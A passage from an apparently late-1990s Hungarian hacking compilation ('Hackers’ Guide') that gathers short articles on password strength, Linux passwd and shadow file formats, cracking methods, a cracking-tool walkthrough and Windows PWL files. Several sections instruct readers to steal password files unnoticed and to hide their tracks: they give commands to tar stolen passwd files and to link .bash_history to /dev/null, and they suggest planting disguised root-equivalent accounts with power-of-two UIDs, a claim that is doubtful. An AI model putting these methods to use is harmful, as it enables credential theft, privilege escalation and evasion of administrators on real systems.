lesz megfejteni. (Egy 8 karakteres jELszOiM jelszónak 17 év kell a megfejtéséhez!)<br />
2. A rövid 2-e betűs szavak nincsenek benne a szótárakban mind. És ha ezeket<br />
egymás után írva kreálunk jelszót, azt is húzós lesz megfejteni. Például: BeKiLeFel.<br />
Az általános iskolában tanult igekötőket egyszerűen egymás után írtam, de az első<br />
betűiket nagy betűvel. A megfejtéséhez a táblázat szerint 880 év kell.<br />
Ha van egy nagyon-nagyon gyakran használt jelszó, akkor arra érdemes a CAPS<br />
LOCK technikát alkamazni. Hogy mit is takar ez? Egyszerű: a jelszó megadásánál be<br />
kell kapcsolni a caps lock billentyűt. (Ne a shiftre tenyereljünk rá az feltűnőbb! =)) Ha<br />
ezt kombináljuk számokkal és kis és nagy betűkkel akkor meglepően jó eredményt<br />
érhetünk el. Például. MacskaJajj7%7. Itt látszik, hogy az "M" a "J" és a "%" betűnél<br />
nyomtunk SHIFT billentyűt. De ha így írjuk be: mACSKAjAJJ=5= akkor már kissé<br />
megváltozik az eredmény.<br />
Valamikor a jelszóhoz egy hacker eléggé extrém úton jut hozzá. Például egy<br />
felhasználó egy féle sémára épülő jelszórendszert használ és abból egyet<br />
megszerez. (PL: Gabor%AccExtra, vagy Gabor%AccSwi) innentől eléggé nagy a<br />
valószínűsége, hogy az internet elérési jelszava valami Gabor%AccSzolgaltato lesz<br />
vagy mondjuk a CS.HU-n lévő honlapjának a jelszava Gabor%AccCs lesz.<br />
Mit tudsz tenni?!!?<br />
• Először is használj jelszó tároló programot. Az ilyen jó program automatikusan<br />
generál új jelszavakat az elérhetőségeidnek, és így csak egy fő jelszót kell<br />
választanod és azt megjegyezned a többit a program végzi el helyetted. Amit<br />
ismerek az a PadLock IT de a régebbi verzióknál a program eltárolt jelszavait<br />
17 7
Hackers’ Guide<br />
még egy óvodás is vissza bírta fejteni... =) Szóval inkább nem ajánlok ilyen<br />
programot, mert nem ismerem mindet.<br />
• Készíts elég hosszú jelszavakat! Egy nagyon jól megépített és bekonfigurált<br />
rendszernél (PL: Linux) elég 4 karakteres jelszó is. De mondjuk már a vacak<br />
windoze-nak a 9 karakteres erősen javasolt. Fontos azonban megjegyezni,<br />
hogy sok rendszer maximálja a jelszavak hosszúságát és ez eléggé<br />
behatárolja a jelszavaink bonyolult kialakítását.<br />
• Használj különböző karaktereket, és még kombináld össze más egyéb<br />
jelekkel is! PL: I$am@K! egy eléggé jó és egyszerű jelszónak tűnik. Az I am<br />
OK! ből lett kialakítva. Es van benne kis és nagy betű, és egyéb más karakter<br />
is.<br />
• Mindíg tartsd az emlékezetedben: A rendszerd megbízhatósága annyit ér mint<br />
a leggyengébb láncszemének megbízhatósága! Hiába van 20 karakter hosszú<br />
mindenféle bonyolult jelszavad ha azt a MS Word v7.0 -val használod. Ez<br />
esetben másodperc töredéke alatt fel leszel törve...<br />
Eredeti: SiRiUs Š. feb.-'99. TnX tO "Vitas"<br />
- H3XR00T -<br />
http://hexnet.hpage.<br />
net/<br />
************************************************************************************************<br />
A linux passwd file felépítése<br />
Mielőtt a vén rókák elkezdenének suxxolni le kell, hogy szögezzem, hogy ez a doksi<br />
a kezdőknek készült! Ők meg használják egészséggel! =) Itt főleg a shadowolt és a<br />
nem-shadowolt passwd fileok különbségéről lesz szó. Marha nagy... csak egy "x"<br />
vagy "*" =D<br />
Először is. A linux passwd filejai ezekben a könyvtárakban találhatóak valahol :<br />
/etc/passwd vagy az etc/shadow. Ezekhez ha hozzáférsz akkor kb az alábbi<br />
eredményt láthatod, ha nincsenek shadowolva a jelszavak: Az alábbi passwd file a<br />
CS.HU-ról lett leszedve. =)<br />
admin:aaKRsX3J.tvTU:webmaster@controlshift.hu:Webmaster:30/9/1999:never:top<br />
Nos nézzük mi mit jelent!<br />
admin: Ez a felhasználói név. Itt most admin. A névből ítélve valami nagy fejes<br />
lehet... =)<br />
aaKRsX3J.tvTU: Ez a furcsa karakterekből álló betűhalmaz a jelszó. No mielőtt<br />
mindenki vadul elkezdene telnetelni a szolgáltató 79-es portjára elárulom, hogy ez<br />
kódolt jelszó és még meg kell fejteni valami unix passwd törő proggyval, mondjuk a<br />
17 8
Hackers’ Guide<br />
John the Ripper -rel vagy a Cracker Jack stb... programokkal.<br />
:::::::: Az ezek után jövő kettőspontokkal és egyéb marhaságokkal amik köztük<br />
vannak azokkal ne folgalkozz! =)<br />
Kiegészítés: Valahol a jelszó után egy : -tal elválasztva van egy vagy több szám is.<br />
Pl: Így:<br />
admin:aaKRsX3J.tvTU:253:10:CSAdmin:/cs/admin/www:bin/sh<br />
Ilyen esetben az egyes mezők ezeket jelentik:<br />
Felhasználói nev: admin<br />
Kódolt jelszó: aaKRsX3J.tvTU<br />
Azonosító szám: 253<br />
Csoportazonosító: 10<br />
GCOS mező: CSAdmin<br />
Home könyvtár: /cs/admin/www<br />
Kezdeti shell: /bin/sh<br />
No igen. De már hallom is a kérdést, hogy "én is szereztem egy ilyen passwd file-t de<br />
nem egészen ilyen formátumú...". Ha ez az eset áll fent akkor te valószínűleg egy<br />
shadowed passwd file-t szereztél meg. (Vagy ha nem akkor kérdezd meg a<br />
rendszergazdát, hogy mégis ő tudja-e, hogy milyen passwd file-t szereztél meg tőlük<br />
=)))) Hogy is néz ki ez valójában?:<br />
root:x:0:0:root:/root:/bin/bash<br />
Mint látható, sokkal rövidebb és a krixkrax karaktereket felváltotta egy x (szokott * is<br />
lenni). Nézzük meg, hogy ebben a felállásban mi micsoda:<br />
root: Ez még mindíg az a felhasználói név amire minden hacker/cracker/istentudjami<br />
áhítozik. =D<br />
x: Hoppááááááááá. Mivel a passwd file shadowolva van ezért a rejtjelezett jelszót<br />
felváltotta egy "x" karakter.<br />
root:/root:/bin/bash: Ez elvileg a shell mit az user használhat, kaphat. =I<br />
- H3XR00T -<br />
http://hexnet.hpage.net/<br />
************************************************************************************************<br />
Jelszófeltörés<br />
17 9
Hackers’ Guide<br />
Nnna........! Jelszó fejtő programot tettem ide. Unixhoz (szerintem) nem sokan<br />
értenek, ezért azt kihagyom. Ez a cain prg relativ lassú, de sok mindent tud.<br />
Indulásnak jó lesz. Win95/98 alatt műxik.<br />
Pár szó a titkositásról, hogy legyen fogamad arról amit csinálsz. Talán az első hires<br />
alkalmazója Julius Ceasar volt. Innen ered a neve is a Ceasar féle titkositásnak(a<br />
technologiára nem térnék ki). A mostanában használt módszer a DES (Data<br />
Encyption Standard), de van még ezer féle. A módszer a következő: egy 64 bites<br />
nyilt szöveget 64 bites titkositott szöveggé alakit, egy 56 bites kulcs segitségével. Az<br />
érzékelhetőség kedvéért csináltam egy ábrát is.<br />
A felcseréléseket a P , a helyettesitéseket az S doboz végzi. A P doboz nem más,<br />
mint egy 8 be és kimenelelű áramkör egy bemenő paraméter által meghatátozott<br />
össze-vissza kötött ki és bemenetelekkel, azaz a bemeneti 8 bit fecserélésével allitja<br />
elő a 8 bites kimenetet. Az S doboz a bemenetére adott 3 bit nyilt szöveget alakitja át<br />
3 bit titkos szöveggé. Az első lépésben a kulcstól független felcserélés történik, mig<br />
az utolsónál ennek a forditottja. Itt az első 32 bitet felcserélik az utolsó 32-vel. A<br />
köztük lévő 16 fokozat ugyanigy műxik, de a kulcs más-más része határozza meg az<br />
alkalmazott P, S dobozok adott felépitését. Ha ezt az ember felirja logikai<br />
fügvényekkel, akkor az alapján készithető egy (elvi) titkosito prg. Az okosok azt<br />
mondják, hogy az nem jó, amit pár év alatt vissza lehet fejteni. Különbözö cégek<br />
mikor piacra dobnak 1-1 ilyent, altalában sikerdij üti a markát annak aki vissza fejti a<br />
holmit.<br />
************************************************************************************************<br />
Jelszavak törése<br />
A jelszavakat általában a következo módszerrel titkosítják: A jelszóból létrehoznak<br />
egy fix hosszúságú jelsorozatot, bizonyos hash nevezetu függvény(ek) segítségével.<br />
Minden különbözo jelszóhoz különbözo hash jelsorozat generálódik, a legkisebb<br />
változtatásnál is szinte az egész jelsorozat teljesen más lesz. Az algoritmust viszont<br />
nem lehet megfordítani, így ezzel a módszerrel nem kapjuk meg a jelszavakat, csak<br />
az egyik irányba muködik a dolog.<br />
18 0
Hackers’ Guide<br />
A jelszótöro progik muködése a következo: Eloállítják a kipróbálandó jelszóból a<br />
hash függvény segítségével a fix hosszúságú jelsorozatot, majd ezt hasonlítják<br />
össze a password fájlban lévo, jelszóval, amire szintén rá van eresztve a hash<br />
algoritmus. Ha megegyezik a két hash jelsorozat, akkor megtalálta a jelszót. Ha nem,<br />
akkor jöhet a következo lehetoség.<br />
A passwordök megfejtésére van néhány módszer, ezek a következok:<br />
brute force attack: Ez a legidoigényesebb megoldás, miszerint végigpróbáljuk az<br />
összes lehetséges megoldást. Eloször kezdjük a legrövidebb jelszavakkal : "a", "b",<br />
"c", ... "z", plussz még számok, illetve más speciális karakterek. Az átlag lamer<br />
emberek nem használnak ilyen "bonyolult" jelszavakat, de kivétel erosíti a szabályt,<br />
és különben is, cirka 26 lehetoség nem nagy durranás az esetleges több száz-ezer<br />
millió vagy milliárd lehetoséghez képest. Persze ha be van állítva, hogy legalább 6<br />
karakteres legyen a jelszó, akkor felesleges a rövidebbekkel futtatni a jelszótörot.<br />
Ezek után egyesével emeljük a jelszó hosszát, és így is kipróbáljuk az összes<br />
lehetoséget, a-tól z-ig. Elonye hogy így biztos hogy megtaláljuk a jelszót , hátránya<br />
az idoigényessége, egy jobb gépen is napokig/hetekig tarthat a törés, és ez nem a<br />
legjobb megoldás, ha a jelszavakat mondjuk kétnaponta váltogatják. Ilyen esetben<br />
nem valószínu, hogy ilyen egyszeru jelszavakat használnak, szinte biztos hogy van<br />
benne néhány nagybetu és szám is. Persze csak akkor kapjuk meg így a jelszót, ha<br />
a jelszótöro proginak megadtuk az összes olyan karaktert, ami elofordulhat a<br />
jelszóban. Pl.: a jelszó "aaaa3" akkor hiába futtatjuk úgy a progit, hogy próbálja végig<br />
az összes olyan jelszót, ami tartalmazza az a..z betuket.<br />
dictionary attack: Ennek a módszernek a hatékonysága csak az emberi lustaságtól<br />
függ, miszerint az emberek nagyrésze hétköznapi szavakat használ jelszóként (vagy<br />
éppen a keresztnevét, vagy más hasonló publikus adatok magáról), részben ezért,<br />
hogy el ne felejtse (lásd pl.: a feltört elenderes jelszavakat). Kell hozzá lehetoleg egy<br />
minél nagyobb szótárfájl, ami az adott nyelv szavaiból tartalmaz lehetoség szerint<br />
minél többet, esetleg még egy angol vagy német. A módszer lényege az, hogy a<br />
szótárfájl szavaiból egyesével eloállítják a kódolt jelszót, majd ezt hasonlítják össze a<br />
password fájlban találhatóakkal. Ezzel elég hamar lehet végezni, ajánlott hozzá egy<br />
minél nagyobb szótárfájl. (Egy fokkal "bonyolultabb" jelszóként szokták használni a<br />
szó visszafelé írt alakját.)<br />
hybrid attack: Ez az elobbi két lehetoség kombinálása, arra a tényre épül, hogy a<br />
felhasználók sokszor választanak olyan jelszót, ami egy sima szóból és egy-két<br />
egyéb karakterbol áll (pl.: zsuzsa45, kert12). Példának ismét csak álljanak itt az<br />
elenderes jelszavak. Ehhez is csak egy szótárfájl kell, meg lehetoleg olyan<br />
jelszótöro, ami ismeri ezt a lehetoséget. Ha nincs olyan, akkor az sem baj, írjunk mi<br />
egy kis progit, ami egy rendes szótárfájlban található minden egyes szóból elkészíti a<br />
hybrid attackes változatait, majd ezeket beleírja egy másik fájlba. A jelszótörot ezek<br />
után már csak a hybrid szavakat tartalmazó - jóval nagyobb - jelszó fájllal kell futtatni.<br />
Ez a megoldás még mindig sokkal gyorsabban vezethet eredményhez, mint a brute<br />
force attack. A hatalmas hybrid szótárt esetleg fel lehet darabolni több gép között, így<br />
párhuzamosítva a törést.<br />
Gyorsítási módszerek:<br />
Itt nem térek ki a grafikus felületek eroforrásigényeire, szerintem mindenki számára<br />
egyértelmu, hogy két ugyanolyan jól megirt program közül a karakteres felületü<br />
18 1
Hackers’ Guide<br />
sokkal gyorsabb lehet, mint (esetleg windowsos) grafikus felületet használó társa.<br />
Persze a mai PII-es és Celeron proceszokon nemsok küldönbséggel fut a 16 bites<br />
kód, mint egy 200-as pentiumon, ezért ebbe a hibába sem szabad beleesni. Ha a<br />
próbálgatás gyorsan megy - pl.: másodpercenként több százezer kombináció<br />
végigpróbálása - akkor még véletlenül sem szabad minden kombinációt kiiratni a<br />
képernyore, elég csak százalékban, vagy mondjuk percenként az éppen aktuálisat,<br />
mivel ez is elég sok idot elvehet a törésbol.<br />
A brute force törésen azzal is lehet gyorsitani, hogy nem abc sorrendbe rakjuk a<br />
betüket, amelyek a jelszót alkotják, hanem elofordulási valószinüségüknek<br />
megfeleloen. Mindenki tudja, hogy a magyar szavakban a legtöbbször eloforduló<br />
magánhangzó az "e" betü, rakjuk ezt a lista elejére! (Tehát ezentúl nem<br />
"abcdefghij...z"-t adunk meg a programnak, hanem "eabcdfghij...z"-t.) Persze ezek<br />
minden szakmai szövegnél másként alakulnak, hiszen egy szakmai vagy egyéb<br />
terület, téma gyakran eloforduló szakkifejezései erosen befolyásolhatják ennek a<br />
listának az alakulásást.<br />
Bármelyik módszernek általában csak akkor van értelme, ha hamarabb sikerül<br />
megfejteni a jelszót, a következo jelszócsere idopontjánál. Ehhez nem árt egy gyors<br />
gép, vagy akár több is. Persze ha megint figyelembevesszük az emberi lustaságot,<br />
akkor - ha nincs is benne a jelszó semmilyen szótárban - érdemes lehet a lejárt<br />
passwordöket elrakni egy szótárfájlba, mert lehet hogy ezek "hybrid" változatai<br />
lesznek a következo jelszavak.<br />
Sun-Zero<br />
sun-zero@freemail.hu<br />
************************************************************************************************<br />
Jelszótörés<br />
Sokan kértétek, hogy erről a témában írjak részletesebben, mert már hú de sok<br />
jelszó fileotok van, de nem tudtok vele mit kezdeni. Ja igen és az is fontos volt, hogy<br />
érthető legyen. Na ennél érthetőben aztán nem tudom leírni, de aki ezek után is<br />
bénázik / nem ért valamit az már vessen magára! Nos itt van tehát közkívánatra.<br />
Először talán 1 kis ismertető a jelszófileról. A Hol találjuk a passwd fájlokat című<br />
cikkben le van írva, hogy hol találjuk őket. Mivel legtöbben erre voltatok kiváncsak a<br />
Linuxban álltalába a etc/passwd, vagy az ect/shadow fileban található.<br />
Íme így néz ki:<br />
root:Fpkd1rH58rmi:0:0:root:/root:/bin/bash<br />
daemon:*:1:1:daemon:/usr/sbin:/bin/sh<br />
bin:*:2:2:bin:/bin:/bin/sh<br />
sys:*:3:3:sys:/dev:/bin/sh<br />
sync:*:4:100:sync:/bin:/bin/sync<br />
18 2
Hackers’ Guide<br />
games:*:5:100:games:/usr/games:/bin/sh<br />
man:*:6:100:man:/var/catman:/bin/sh<br />
lp:*:7:7:lp:/var/spool/lpd:/bin/sh<br />
mail:*:8:8:mail:/var/spool/mail:/bin/sh<br />
news:*:9:9:news:/var/spool/news:/bin/sh<br />
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh<br />
proxy:*:13:13:proxy:/bin:/bin/sh<br />
majordom:*:30:31:Majordomo:/usr/lib/majordomo:/bin/sh<br />
postgres:*:31:32:postgres:/var/postgres:/bin/sh<br />
www-data:*:33:33:www-data:/var/www:/bin/sh<br />
backup:*:34:34:backup:/var/backups:/bin/sh<br />
msql:*:36:36:Mini SQL Database Manager:/var/lib/msql:/bin/sh<br />
operator:*:37:37:Operator:/var:/bin/sh<br />
list:*:38:38:SmartList:/var/list:/bin/sh<br />
irc:*:39:39:ircd:/var:/bin/sh<br />
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats/gnats-db:/bin/sh<br />
alias:*:70:65534:qmail alias:/var/qmail/alias:/bin/sh<br />
qmaild:*:71:65534:qmail daemon:/var/qmail:/bin/sh<br />
qmails:*:72:70:qmail send:/var/qmail:/bin/sh<br />
qmailr:*:73:70:qmail remote:/var/qmail:/bin/sh<br />
qmailq:*:74:70:qmail queue:/var/qmail:/bin/sh<br />
qmaill:*:75:65534:qmail log:/var/qmail:/bin/sh<br />
qmailp:*:76:65534:qmail pw:/var/qmail:/bin/sh<br />
nobody:*:65534:65534:nobody:/home:/bin/sh<br />
uservagyok:Hgjrhhr851h:1000:1000:GECOS,,,:/home/uservagyok:/bin/bash<br />
Na ebből nekünk 1enlőre a root:Fpkd1rH58rmi:0:0:root:/root:/bin/bash sor a<br />
fontos + a<br />
uservagyok:19S/JDGNuqnek:1000:1000:GECOS,,,:/home/uservagyok:/bin/bash<br />
sor.<br />
A többiek nem felhasználók ilyen userek, hogy mail + daemon+games + proxy stb...<br />
:)) nincsenek ezek a rendszer működéséhez szükséges operátori számlák, de ez<br />
most nem lényeg.<br />
Vizsgáljunk + jobban 1 sort:<br />
uservagyok:19S/JDGNuqnek:1000:1000:GECOS,,,:/home/uservagyok:/bin/bash<br />
uservagyok: felhasználó neve<br />
Hgjrhhr851h: felhasználó kódolt jelszava<br />
1000: felhasználő azonosítója<br />
1000: felhasználó csoport azonosítója<br />
GECOS: felhasználó neve<br />
/home/uservagyok: felhasználó alap könyvtára<br />
/bin/bash: felhasználó shellje<br />
A GCOS vagy GECOS az alapértelmezett ezt később + lehet változtatni a chfn<br />
paranccsal.<br />
A Hgjrhhr851h és a Fpkd1rH58rmi nem valós kódolt pw-k, bizonyos okok miatt (tehát<br />
ne próbáljátok visszafejteni).<br />
18 3
Hackers’ Guide<br />
Úgye a root a fontos, mert az a rendszergazda. Csakhogy álltalába a rendszergazda<br />
olyan kódot ad + amit sok időbe telik visszafejteni (számok, kis és nagybetű stb.) (DE<br />
nem mindig) a user meg álltalába bénát (értelmes szót stb.) Ez most végül is mind1.<br />
Úgyis észrevesszük, ha már 50 éve fejtünk vissza 1 pw filet és semmi:)))) Habár a<br />
UNIX rendszerekben a jelszó max. 8 karakter hosszú lehet, ez ne tévesszen +<br />
senkit, mert így is 1 [A-z 0-9..] -es és 8 karakter hosszú pw-t 1000000 jelszó/seces<br />
sebbel (1 jó pw törő progi kb. így dolgozik) is kb. 177.35 év +törni. No de ilyen pw-k<br />
nagyon nem gyakoriak. (nem a fasz nem) :)) Na elég a hülyeségből, majd ha<br />
máshogy nem megy, akkor user szintről feltornásszátok magatokat roottá, vagy<br />
nem:)<br />
Ja, majd el felejtettem akkor van szívás ha szemét, túlbuzgó rendszergazda ellenőrzi<br />
a userek béna pw-it, és +változtatja ilyen 177 éves szintűre. A kis kitérő után akkor<br />
kanyar vissza az eredeti témához.<br />
Indítsátok el Pw törő a progit. A Password crack és prg-k fejezetnél található (NT<br />
Unix Password Cracker).<br />
Ekkor ez a kép jön be. Na most részletességről lévén szó, clickeljetek rá szépen a<br />
Get Cracking gombra.<br />
Ezután ez a kép fogad titeket. Password file...tyúú ez mi lehet??<br />
Na itt most nem kell mást tenni, minthogy átnevezitek a pw filet *.txt-re. pl:<br />
passwd.txt. A browse-al + keresitek. Ha minden ok akkor kb. így kell kinéznie:<br />
18 4
Hackers’ Guide<br />
Output. Na most 1 nagyon nehéz dolog jön! :)) Készítsetek 1 tetszőleges nevű txt<br />
filet. pl: pwfejtés.txt. Ebbe a fileba kerül majd az eredmény (+fejtett pw-k) browse stb<br />
aztán enter.<br />
World list.. Ide kell berakni a netről vagy innen-onnan leszedett filet ami minél<br />
nagyobb annál jobb. Akkor van jelentősége, ha feltételezzük, hogy értelmes szó a<br />
pw. Így gyorsabb a fejtés. Ilyen filet mi is csinálhatunk. Nem nagyon használok ilyet.<br />
Ha ilyen nincs akkor a brute-force attack (nyers erő) módban kezd el működni, ami<br />
rules.<br />
18 5
Hackers’ Guide<br />
Ezután be lehet álltani, hogy számokat is nézzen (0-9) + symbols-t is lehet benyomni<br />
+ minden szart, de az lassítja a keresést, de biztosabb, hogy +találjuk a filet. Az a<br />
véleményem, hogy ha van a pw-ba symbol + hasonló szarok akkor az a pw már 177<br />
éves effektus lesz, :)) úgyhogy ne rakjuk be, mert úgyse várjuk ki 1 ilyen pw-nek a<br />
+fejtését. (a (0-9) azért hasznos!!!) Akkor, ha minden kész click a search-ra. Még<br />
nem vagyunk készen. Most jön a legbonyolultabb része az egésznek. Ki kel menni a<br />
frigóhoz és elővenni a Fantát, esetleg sört stb. és várni kell!!! :)))<br />
Ha vártunk eleget, akkor azt kell csinálni, hogy várjunk még 1 picit, és ha ekkor sincs<br />
semmi, akkor (frigóhoz ki) öntünk 1 kis vodkát is a fantába, mert már kezdünk<br />
ingerültté válni, és ez majd oldja a feszkót. (vodkanarancs rules 4ever)<br />
Utána még várunk 1 kicsit és utána nézzük meg mi történt. Ha sikerrel jártunk és<br />
találtunk 1 pw-t akkor ez a kép fogad minket:<br />
Igen, találtunk 1 pw-t. Ekkor 1000-rel megnézni a pwfejtés.txt-t és mondogatni, hogy<br />
remélem a root pw-t találta meg, remélem a root pw-t találta meg. Aztán bassza+<br />
csak a userét nyomta ki szöveg jön :)) Ha csak a userét akkor se csüggedjünk azzal<br />
is nagyon sok mindent lehet már csinálni! pl: várjunk tovább.:)) Álltalába amúgy is ezt<br />
löki ki előbb.<br />
Akkor vizsgáljuk a pwfejtés.txt-t.<br />
Cracking for 'C:\ntcrack\Pw.txt' melyik pw filet törtük<br />
-->Started: Wednesday,<br />
mikor csináltuk e remek tetett<br />
January 1, 2000 at 17:11:34<br />
--->Number of accounts: 5 mennyi betűből állt az account<br />
-->Crack method: Brute force Brute force (erről már volt szó)<br />
-->Using: Lowercase<br />
ezekről is<br />
alphabet, Digits.<br />
18 6
Hackers’ Guide<br />
minimális / maximális jelszó méret. (ezt magától állitja<br />
-->Min length: 3 Max length: 8<br />
a prg)<br />
-->Starting password: aaa honnan kezdte a prg a fejtést<br />
Account: uservagyok has uservagyok felhasználónak (user név) a jelszava<br />
password: user1<br />
user1 (*) Ez az 1ik amit kerestünk.<br />
-->Cracking stopped; found 1<br />
passwords.<br />
1 pw nél leálltunk (mi a ráknak több???) :))<br />
-->Cracking finished: mikor végeztünk (ez akkor lényeges ha több évig<br />
Wednesday, January 4, 2000 fejtettünk, és rájövünk felesleges volt a sok időt erre<br />
at 21:23:52<br />
kúrni, mert addigra megváltoztatták) :))<br />
-->Last password tried: uxrg utolsó próbált pw<br />
* igazából nem ezt a pw-t kaptam<br />
Ja még 1 fontos dolgok. Hasonlitsuk még 1* össze azt a két sort:<br />
root:Fpkd1rH58rmi:0:0:root:/root:/bin/bash<br />
uservagyok:Hgjrhhr851h:1000:1000:GECOS,,,:/home/uservagyok:/bin/bash<br />
Akkor most nézzük meg miben tér el az 1ik sor a másiktól?? Hát abban, hogy a<br />
szemét rootnak a felhasználó azonosítója 0 és a felhasználó csoport azonosítója is<br />
0. Hát igen, ha neked is ez lenne a nevet mellet, akkor te is root lennél. Namost:)) Ez<br />
1 kicsit eltér a témától. De most már mind1, ha belekezdtem. Ha valamilyen<br />
módszerral tudsz írni a pw fileba az jó.(pl: sendmail módszer stb.., de erről<br />
részletesebben másik cikkben majd) És miért jó??? Hát azért, mert a root jelszavát<br />
nem tudod, de ha adott rendszerben Te user vagy akkor tudsz adni magadnak root<br />
jogokat. (a saját pw-det +csak tudod). DE, semmi esetre se és neki a fájlnak, és kezd<br />
el 0:0 gépelni, mert rá fogsz szívni.. Azért, mert az összes ellenőrző program (ha van<br />
ilyen a rendszeren) jelezni fog, hogy problem van. Arról nem is beszélve ha a<br />
root kiadja a finger parancsot akkor feltűnő lesz, hogy 2 root is van a rendszeren.....<br />
Ilyenkor legjobb azt csinálni, hogy megadod pl: ezt 262144:262144 Ez azért jó, mert<br />
2-nek magasabb hatványait +adva is root jogokat kapunk. Erre azonban már nem<br />
figyelnek a prg-k. Sőt, a finger parancs kiadása után is csak azt látja root, hogy 1<br />
sima user van bent. höhö ql. De ez max. 1-2 óráig/napig jó, mert ha belenéz a gazda<br />
a pw filebe látni fogja, hogy nem ok a systemben valami.....<br />
Hát akkor végeztünk is volna ezzel. 1 kis összefoglalás. A lényeget leírtam. A<br />
részletesség néhol a minőség rovására ment, abból a tekintetből, hogy néha már<br />
olyan részletes volt, hogy elröhögtem magam. (de ezzel nyaggattatok, hogy részletes<br />
legyen ám). A módszer szerintem elmegy pl: 4-5 karakteres pw-ket amikben esetleg<br />
van szám is esetleg kis/nagy betű keverve 1 olyan 3-4 nap alatt +fejt. Legtöbbször a<br />
root jelszót is. A 7-8 karakteres speckó symbólokat is tartalmazó pw-k suxx. 1-2<br />
hétnél tovább nem érdemes fejteni 1 pw-t se!! mert az vagy több száz év alatt megy,<br />
de lehet hogy +van 1 hónap alatt, de addigra már lehet +változtatták. Szóval ez van<br />
srácok.....<br />
Dodge Viper<br />
http://w3.swi.hu/dviper<br />
************************************************************************************************<br />
18 7
Hackers’ Guide<br />
Passwd<br />
A passwd filet Linuxokon a /etc -be találhatjuk meg és ott a passwd file név alatt. Ha<br />
a serveren shadow található ne is próbálkozzunk azt letölteni mert ugysem lehet. Ha<br />
meg hozzá szeretnénk jutni vagy rootnak kell lennünk a serveren vagy megkell<br />
törnünk azt , de ha már megtudjuk törni akkor felesleges ezt a szöveget olvasni. :-)<br />
Ha úgy szeretnánk leszedni a passwd filet hogy a root ne vegye észre akkor<br />
próbáljuk meg átmásolni a home könyvtárunkba. Ha sikeresen átmásoltuk nézzuk<br />
meg hogy esetleg nincs e régebbi lementett passwd file amihez hozzá férhetünk,<br />
majd utána ezeket is másoljuk át. Ha mind ezzel meg vagyunk , nézzük át a passwd<br />
filet hogy használni tudjuk e. Ha minden rendben van érdemes ezeket átnevezni ,<br />
mert a root ha egyszer megnézi az ftp logokat érdekes dolgokat fog benne látni.<br />
Tehát ha pl: a login nevunk dudu akkor érdemes egy dudu.txt -re átnevezni oket mert<br />
az nem olyan feltüno. Ha esetleg több passwd fileunk is van akkor tar gzipeljuk oket<br />
össze így: tar -czvf dudu.tar.gz passwd* . Majd ha sikeresen letöltöttük akkor<br />
vizsgáljuk meg a .bash_history -nkat.. hogy az egészbol mi található benne. Ezt<br />
érdemes letörölni majd átlinkelni a /dev/null -ba , azt így: ln -s .bash_history /dev/null<br />
. Ezt érdemes a passwd lopás elott megcsinálni. Természetesen ezt az egészet csak<br />
akkor csináljuk meg ha a root nincs bent a serveren. Ha minden nyomot sikeresen<br />
eltüntettünk akkor már csak egy password crackerel kell megnézni a passwd filet mi<br />
mindent tudunk belole megtörni.<br />
Dudu<br />
************************************************************************************************<br />
Re: Passwd<br />
H3XR00T nem említett pár érdekességet a jelszófile-al kapcsolatban.<br />
Abban a szerencsétlen esetben, ha valakinek nincs a jelszava helyén semmiféle<br />
karakter (pl., kutya::666:666:Kiskutya:/home/kutyuli:/bin/bash ), az adott<br />
felhasználónévvel belépve nincs szükség jelszó használatára.<br />
A 0-s uid-al rendelkezô felhasználóknak rendszergazdai jogosultságaik vannak.<br />
Bizonyos rendszerek 2 magasabb hatványait is 0-s UID-nak kezelik - ilyen például a<br />
131072, aminek gazdája szintén élvezheti a rendszergazda jogait.<br />
"root:/root:/bin/bash: Ez elvileg a shell mit az user használhat, kaphat" - írta<br />
18 8
Hackers’ Guide<br />
H3XR00T. Az elsô "root" a felhasználónév az elöbbi részletben, a második a home<br />
könyvtár, és csak a harmadik shell.<br />
Eredeti: ViDe0<br />
- H3XR00T -<br />
http://hexnet.hpage.net/<br />
THX kiegészítésért ViDe0! =)<br />
************************************************************************************************<br />
PWL Hacking Tutorial<br />
PWL=PassWord List. A Windows alapú rendszerek ilyen kiterjesztésu fájlokban<br />
tárolják a jelszavakat, a gépen levo felhasználók felületéhez. És ez még nem<br />
minden, ezekben a fájlokban el van tárolva mindaz, amivel a kapcsolatba kerültél<br />
jelszó szinten, pl ha egy internetes laphoz kód kell (szabvány kódbekéro) akkor ez is<br />
ezekben a fájlokban tárolódik.<br />
A Win 95 OSR2 és a WIN98 PWL formátuma megegyezik, a Win NT más biztonsági<br />
modellt használ, az alap W95-é pedig elég szegényes... :-)<br />
Tehát a PWL-ben az alap felhasználó felülethez tartozó jelszó MELLETT további<br />
jelszavak is lehetnek, melynek típusai:<br />
Res. Type: Link<br />
Ez az említett internetes oldalra a jelszó<br />
Res. Type: Mail<br />
Helyi hálón a levelezoszerverhez a hozzáférés<br />
Res. Type: Dial<br />
Hát igen, ez a leghasználhatóbb, mégpedig a Dial-Up (Telefonos hálózat) jelszava<br />
Biztosan van még, ezekkel találkoztam.<br />
A továbbiakban a W95OSR2/W98 pwl állományait tekintsétek defaultnak, arról<br />
beszélek. :) Ha a pwl fájl csak a felhasználói felületet orzi, nincs benne eltárolva<br />
semmi pluszinformáció, akkor a mérete 688 bájt. Ha internetes jelszó szerzésére<br />
adtad a fejed, akkor az ilyen fájlokkal fölösleges foglalkoznod. Ha ennél nagyobb a<br />
méret, akkor biztos lehetsz benne, hogy van valamilyen ajándék a fájlban... :)<br />
Ezek a jelszavak természetesen kódolt formában találhatók meg a fájlban. Tehát egy<br />
szimpla F3-mal nem tudod megnézni ezeket az információkat. Ha plusz<br />
információkat (ezt nevezik cached passwords-nek) szeretnéd megtudni, akkor is<br />
18 9
Hackers’ Guide<br />
szükséged van a pwl-hez tartozó jelszóra, hiszen az ebbol álló/keletkezo kulccsal<br />
van kódolva az is. Ami még a PWL mellett szól, hogy a nyitójelszója (tehát nem a<br />
cached passwords) nem case sensitive, azaz nincs benne kis/nagybetu<br />
megkülönböztetés. Ennek akkor van nagy jelentosége, ha nekiállsz Brute Force-szal<br />
törni, de errol majd lejjebb.<br />
Kaptam egy kedves levelet, amiben a PWL törésnél jobb módszert mutattak... hehe...<br />
csak egy két apróság van benne buktatóul. Tehát mint említettem a plusz információ<br />
a lényeg. Ennek a megtudásához IS a pwl jelszavára van szükség. Létezik olyan<br />
program (pl.: pwlcrack) ami megmutatja a cached password-öket viszont az<br />
AKTUÁLIS felhasználóét. Ha egyszer már belépett az ember, akkor a jelszava már<br />
